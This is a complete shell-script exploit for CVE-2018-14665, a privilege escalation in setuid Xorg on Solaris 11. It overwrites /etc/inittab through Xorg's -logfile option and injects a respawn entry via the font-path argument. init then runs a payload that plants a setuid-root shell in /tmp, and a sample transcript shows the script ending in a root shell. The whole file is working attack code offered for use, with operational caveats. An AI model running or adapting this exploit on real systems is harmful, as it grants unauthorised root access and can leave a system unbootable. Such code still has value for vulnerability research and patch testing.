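#!/bin/sh
#
# raptor_solgasm - xorg-x11-server LPE via Solaris inittab
# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# "In video games, this is what they call respawning" -- Nick Sax
#
# This exploit targets /etc/inittab in order to escalate privileges to root
# on Solaris 11 (no need to be connected to a physical console). Messing with
# inittab is considerably dangerous and you may trash your system, however the
# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't
# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!
#
# How it works: the setuid Xorg is started with -logfile pointing at
# /etc/inittab, so its log file overwrites the real inittab. The bogus -fp
# (font path) value is shaped like an inittab "respawn" entry for
# /tmp/solgasm, which is expected to land in that log and make init run the
# payload as root. The previous inittab survives as /etc/inittab.old (see the
# transcript below) and must be moved back afterwards.
#
# Operational caveats (read before running):
# - The payload leaves a setuid-root binary in /tmp. It is created 4755, NOT
#   4777: a world-writable setuid-root file could be overwritten by any other
#   local user and would hand root to everyone on the box. Remove it when done.
# - /tmp is world-writable and the payload/binary paths are fixed, so stale
#   copies are removed first and the payload is written with noclobber; a file
#   planted by another user under the same name is never executed as root.
# - The Xorg instance started here is signalled by PID; pkill is only the
#   fallback if that fails, since it would hit every Xorg we may signal.
# - The wait for the setuid shell is bounded by SOLGASM_TIMEOUT seconds
#   (default 900); if init never picks up the entry, restore inittab by hand.
#
# See also:
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_solgasm
# raptor@stalker:~$ ./raptor_solgasm
# [...]
# Now please be patient for a few minutes...
# [...]
# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab
# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab
# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old
# -rwsr-xr-x 1 root root 1249080 nov 24 22:05 /tmp/pwned
# root@stalker:/etc# id
# uid=0(root) gid=0(root)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
# Oracle Solaris 11 SPARC [untested]
#
echo "raptor_solgasm - xorg-x11-server LPE via Solaris inittab"
echo "Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>"

# POSIX sh only (shebang is /bin/sh): no [[ ]], arrays or pipefail below.
TIMEOUT=${SOLGASM_TIMEOUT:-900}

# Print a message to stderr and abort.
die() { echo "$*" >&2; exit 1; }

# The payload and the setuid shell live in world-writable /tmp under fixed
# names. Drop any stale copies of ours; if something is still there it belongs
# to someone else (sticky bit) and init would run it as root, so bail out.
rm -f /tmp/solgasm /tmp/pwned /tmp/pwned.c 2>/dev/null
[ -e /tmp/solgasm ] && die "refusing to run: /tmp/solgasm exists and is not ours"
[ -e /tmp/pwned ] && die "refusing to run: /tmp/pwned exists and is not ours"

# prepare the payload
# Quoted delimiter: the file is written verbatim, nothing is expanded here.
# noclobber makes the redirection fail instead of writing into a file that
# appeared between the check above and this write.
set -C
cat << 'EOF' > /tmp/solgasm || die "cannot create /tmp/solgasm"
cp /bin/zsh /tmp/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/bash\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /tmp/pwned
# 4755, not 4777: a world-writable setuid-root binary is a root backdoor for every local user
chmod 4755 /tmp/pwned
EOF
set +C
chmod +x /tmp/solgasm || die "cannot make /tmp/solgasm executable"

# trigger the bug
# Random 4-char inittab id (x + 3 lowercase letters) so the entry is unique.
PWN=x$(env LC_CTYPE=C tr -dc '[:lower:]' < /dev/urandom | fold -w 3 | head -1)
cd /etc || die "cannot cd to /etc"
Xorg -fp "${PWN}::respawn:/tmp/solgasm" -logfile inittab :1 &
XPID=$!
sleep 5
# Stop only the instance we started; fall back to the original pkill if
# that PID is gone (e.g. a wrapper that forked the real server).
kill "$XPID" 2>/dev/null || pkill Xorg

# run the setuid shell
echo
echo "Now please be patient for a few minutes..."
echo
# Bounded wait: init picks the new entry up on its own schedule; give up after
# TIMEOUT seconds instead of looping forever with a trashed inittab.
waited=0
until [ -u /tmp/pwned ]; do
  [ "$waited" -ge "$TIMEOUT" ] && die "timed out after ${TIMEOUT}s waiting for /tmp/pwned; check /etc/inittab and restore /etc/inittab.old by hand"
  sleep 1
  waited=$((waited + 1))
done
echo "To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab"
echo "When done, also remove /tmp/pwned /tmp/pwned.c /tmp/solgasm (setuid-root binary left in /tmp)"
ls -l /etc/inittab*
ls -l /tmp/pwned
sleep 1
/tmp/pwned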